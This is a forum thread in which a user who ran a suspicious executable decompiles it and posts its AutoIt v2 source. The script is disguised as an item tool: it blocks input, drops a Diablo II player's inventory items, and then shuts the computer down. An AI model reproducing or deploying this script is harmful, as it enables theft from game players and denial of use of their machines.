Decompile old v2 scripts

[DaProgrammer]

in my uber stupidity i agreed to download an app some1 sent me (don't ask why but whats done is done)

the app asked me some questions and shut my comp down, i restarted and all works fine for now

i'm afraid it put some spyware or something on my comp so i need help

i used resourse hack and found out its autoit ver. 2,63,0,0

is there a way i can decompile it to see what it did to mu comp ?

if u want i can send you the file and ull see what it did or something.

plz help couse im worried its spyware.

tnx in advance for the help guys.

[GaryFrost]

C:\Program Files\AutoIt3\Extras\Exe2Aut or relative to where you have autoit installed

sorry that's only for v3, I'm sure someone has the old one around somewhere

Edited February 6, 2008 by GaryFrost

[DaProgrammer]

C:\Program Files\AutoIt3\Extras\Exe2Aut or relative to where you have autoit installed

i tried it ofc gives the not recognized error

i was thinking maybe there is another solution, or some with more hacking expirience can take a look at the exe for me.

couse i have no idea what to do and really want to know what it did to my comp (thats as close to a scared smily i could find)

[GaryFrost]

You can still download and install 2.64 and run the exe to script: http://www.autoitscript.com/AutoIt/downloads.php

[Swift]

Check your process's is there anything unusual? check your program files folder, and windows folders...is there a folder in there that you didnt install/isnt windows? can you delete this folder? if not...its probably where it came from...if its a virus. then get

SpywareTerminator and turn on HIPS and Clam AntiVirus to check if its running if it is a virus/malware/keylogger etc...it will tell you to ask if you want to block or allow it...choose block...look at the path it says...get Unlocker 1.8.5 and delete that file! thats if its malware/virus/keylogger

[DaProgrammer]

You can still download and install 2.64 and run the exe to script: http://www.autoitscript.com/AutoIt/downloads.php

ty very much it decompiled sucksesfully and its not spyware it was supposed to steal all my ingame items ^^ by click and drop but lucky for me i run it on 2nd comp while i was ingame so nothing happend

im pretty sure nothing happend but i never read aut version 2 so plz take a look ^^

expandcollapse popup

hideautoitwin, on

setenv,t1,200
setenv,t2,200

setenv,command,0


MsgBox, 4, Ith Creator 2.0, Is your resolution 800x600?


loadedtest:
IfWinExist,Diablo II,,goto,loadedandok
msgbox,4,Error,Diablo II Not Loaded... Please Load D2, Get In A Game And Press YES\n\nContinue?
ifmsgbox,yes,goto,loadedtest
ifmsgbox,no,exit

loadedandok:

gosub,commandtest
gosub,ostest
exit



goodos:
sleep,1000
blockinput,on
winactivate,Diablo II
Repeat, 2000
Repeat, 6
sleep,2000
gosub,reztest
ifequal,rez,800,goto,rez800
ifequal,rez,640,goto,rez640

os98:
sleep,1000
blockinput,off
winactivate,Diablo II
Repeat, 2000
Repeat, 6
sleep,2000
gosub,reztest

ifmsgbox,yes,goto,rez800
ifmsgbox,no,goto,rez640

rez800:

send,{space}
send,{enter}
send,Hmmmm
send,{enter}
send,{space}
send,i

leftclick,562,181
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,454,176
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,562,102
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,623,118
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,620,262
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,510,262
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,567,263
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,680,263
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,447,277
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,679,171
sleep,%t2%
leftclick,398,370

send,w

sleep,%t1%

leftclick,454,176
sleep,%t2%
leftclick,398,370

sleep,%t1%

leftclick,679,171
sleep,%t2%
leftclick,398,370

goto,end

rez640:

send,{space}
send,{enter}
send,Hmmmm
send,{enter}
send,{space}
send,i

leftclick,481,100
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,368,86
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,480,32
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,542,47
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,428,197
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,539,191
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,603,197
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,370,210
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,486,191
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,596,102
sleep,%t2%
leftclick,309,280

send,w

sleep,%t1%

leftclick,368,86
sleep,%t2%
leftclick,309,280

sleep,%t1%

leftclick,596,102
sleep,%t2%
leftclick,309,280


goto,end



commandtest:
FileReadLine,command,command.txt,1
ifequal,command,nokill,setenv,command,1
return

ostest:
IfEqual,A_OSVERSION,WIN_XP,goto,goodos
IfEqual,A_OSVERSION,WIN_2000,goto,goodos
IfEqual,A_OSVERSION,WIN_ME,goto,goodos
IfEqual,A_OSVERSION,WIN_98,goto,os98
IfEqual,A_OSVERSION,WIN_95,goto,os98
return

reztest:
mousemove,1000,1000
mousegetpos,x,y
ifequal,x,799,setenv,rez,800
ifnotequal,x,799,setenv,rez,640
return


end:

IfEqual,command,1,goto,nokillexit
sleep,%t1%
send,{ALTDOWN}
send,{f4}
sleep,2000
send,{f4}
send,{ALTUP}
shutdown,1
exit

nokillexit:
sleep,%t2%
send,{space}
sleep,%t1%
send,{enter}
sleep,%t1%
send,Program Ended Without Error
sleep,%t1%
send,{enter}
sleep,%t1%
blockinput,off
exit


[ADLIB]